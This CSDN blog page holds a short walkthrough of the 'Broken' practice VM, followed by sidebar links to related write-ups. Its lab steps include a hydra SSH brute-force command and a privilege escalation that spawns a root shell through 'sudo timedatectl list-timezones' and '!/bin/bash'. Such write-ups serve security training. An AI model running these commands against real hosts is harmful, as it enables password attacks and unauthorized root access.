broken靶机

最新推荐文章于 2024-10-07 10:09:15 发布
最新推荐文章于 2024-10-07 10:09:15 发布
阅读量428 收藏 10
点赞数 4
文章标签: php 服务器 运维 网络 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/141114598
版权

信息收集

1.查看它的mac地址并将网络连接模式改成nat

2.主机发现

3.端口扫描

4.访问80端口

发现一些文件

5.查看readme.md 中是十六进制的值

6.将内容写入readme.md中,使用 xxd 转换

xxd -r -ps readme.md > readme.bin
cat readme.bin

发现是一张图片

7.将后缀修改为 jpg ,查看图片

8.一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh

getshell

1.使用 hydra 进行爆破

hydra -L 123.txt -P 369.txt ssh://192.168.42.192

2.ssh连接

ssh broken@192.168.42.192

提权

1.sudo提权

sudo -l

2.发现是all并发现timedatectl 可以执行root权限,执行命令

sudo timedatectl list-timezones

!/bin/bash

成功提权

左提溜
关注
初识靶机_Broken——渗透day05
qq_62716256的博客
08-12 994
初识靶机_Broken——渗透day05
【实战模拟】下载安装并配置虚拟kali Linux 和 OWASP Broken Web Apps 靶机
热门推荐
₰₯₮ 的博客
12-24 8万+
1、下载安装虚拟机 两种下载虚拟机的方法,一个是华军软件园,来一个是网盘分享的(别用高速下载) ​​​​​​​华军软件园 下载安装虚拟机链接直达 提取码:7bjx 虚拟机下载链接 需要激活码的私信我哈 安装过的就直接跳过看下面,安装虚拟机的步骤就不详细介绍了,直接安装即可。 2、下载Kali Linux虚拟机文件 觉得用什么下载快选哪个 网盘链接:提取码:7sry 网盘Kali链接下载 官网链接:Kali官网链接平台下载 下载完后 打开虚拟机,把刚刚下载好的文件解压一下,然后双击.
broken 靶机 wp
m0_52496313的博客
10-14 161
broken 靶机 wp
broken靶机(计划任务提权)
m0_66299232的博客
11-27 432
9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。
BROKEN-2020: 1靶机
小小猪的博客
07-02 350
BROKEN-2020: 1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.204 扫描端口 访问80端口 扫描目录 查看cms目录 安装,发现第一个flag 扫描cms目录 可以看到多了一个/cms/cc/目录,随便填个地址和端口看看,网页说没有拿到脚本 那么我们看一下他到底是拿什么脚本,本地开启一个服务器,然后再用/cms/cc/页面的功能访问我们本地开启服务器 对方的/cms/cc/网页请求了一个xx.
靶机全家桶之OWASP Broken Web Application
Kevin's Blog
05-08 5984
文章目录一、介绍二、下载三、安装四、技巧 一、介绍   OWASP出具的一个集成在虚拟机中的靶机漏洞环境集合–BWA项目,免费、开源,里面包含: 自动化测试工具 测试源码分析工具 观察网络攻击 测试waf类技术 脆弱的web仿真环境 二、下载 最新版是15年的1.2版本:https://sourceforge.net/projects/owaspbwa/files/ 三、安装 》》解压下载的...
Broken靶机
2401_84564260的博客
08-13 418
发现是一段留言,把上面的一些可能作为账号密码的字符拿下来 做一个简单的字典进行爆破。将内容写入到readme.md中 使用xxd转换。发现timedatectl可以执行root权限。访问readme.md 发现是十六进制的值。查看文件,发现文件头为JFIF。发现账号密码都是broken。将后缀改为jpg,查看图片。使用kail进行扫描ip。探测靶机主机,端口,服务。使用hydra进行爆破。查看靶机的mac地址。
Broken 靶机
weixin_62162207的博客
07-30 284
Broken 靶机
OWASP_Broken_Web_Apps_VM_1.2
02-16
### OWASP Broken Web Apps VM 1.2:深入解析与实战指南 #### 一、OWASP Broken Web Apps VM 概览 **OWASP Broken Web Apps VM**(虚拟机)是OWASP基金会推出的一个用于安全测试的学习平台。它包含了多个故意设计...
OWASP_Broken_Web_Apps_VM_1.2.ova
05-22
ova版owasp官方下载。需要的小伙伴可以自行下载,具体百度网盘地址见txt文本中。OWASP_Broken_Web_Apps_VM_1.2.ova
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
10-03 1560
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
RCE+[伪协议综合]
2302_81328699的博客
10-03 508
伪协议综合
精品WordPress主题/响应式个人博客主题Kratos
2403_86698467的博客
10-05 660
主题设计简约友好,并且支持响应式,自适应访问,简seo单大方的主页构造,使得博客能在臃肿杂乱的环境中脱颖而出,Kratos内置主题设置,可设置seo关键字及站点描述页面伪静态,自定义的顶部样式(背景图 ),
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 1107
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
PHP如何解析配置文件
sheji888的专栏
10-06 744
选择哪种方法取决于你的需求和偏好。INI文件简单且易于手动编辑,而YAML和JSON文件则更适合复杂和层次化的配置结构。PHP数组文件则提供了最大的灵活性,但可能会让配置与代码混淆。无论你选择哪种方法,都要确保配置文件的安全性和可读性,特别是在生产环境中。
PHP 基础语法详解
最新发布
萧鼎的博客
10-07 1004
PHP 是一种嵌入 HTML 中的脚本语言,通常用于开发动态网页。PHP 文件的扩展名通常为.phpPHP 代码可以嵌入在 HTML 代码中执行。PHP 的语法与 C、Java 和 Perl 类似,但比这些语言更简单。PHP 代码通常写在php?php?开源:PHP 是开源的,可以自由使用和修改。跨平台:PHP 可以在多种操作系统上运行,如 Windows、Linux、macOS 等。广泛支持数据库:PHP 支持 MySQL、PostgreSQL、SQLite 等多种数据库。嵌入 HTML。
一个真实可用的登录界面!
Q_w7742的博客
10-05 4471
至此,所有的代码运行之后应该可以实现输入账号密码,与数据库比对,重定向到欢迎界面这样的过程,可以将这个代码放在任何一个需要登录的网页中(自夸一下),当然还有很多很多的内容需要补充,留给你们自己发挥~这里如果php.ini设置不好可能会出现问题,找不到mysqli这个拓展,需要手动处理一下,当然这里不赘述。并且加密的过程被我注释掉了,防止新手搞不明白密码。首先需要一个静态网页,在前面已经讲了很多有关的代码,这里也是常规的,但是这里我们需要post到一个php页面,请注意。连接成功后,输入下面的代码,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值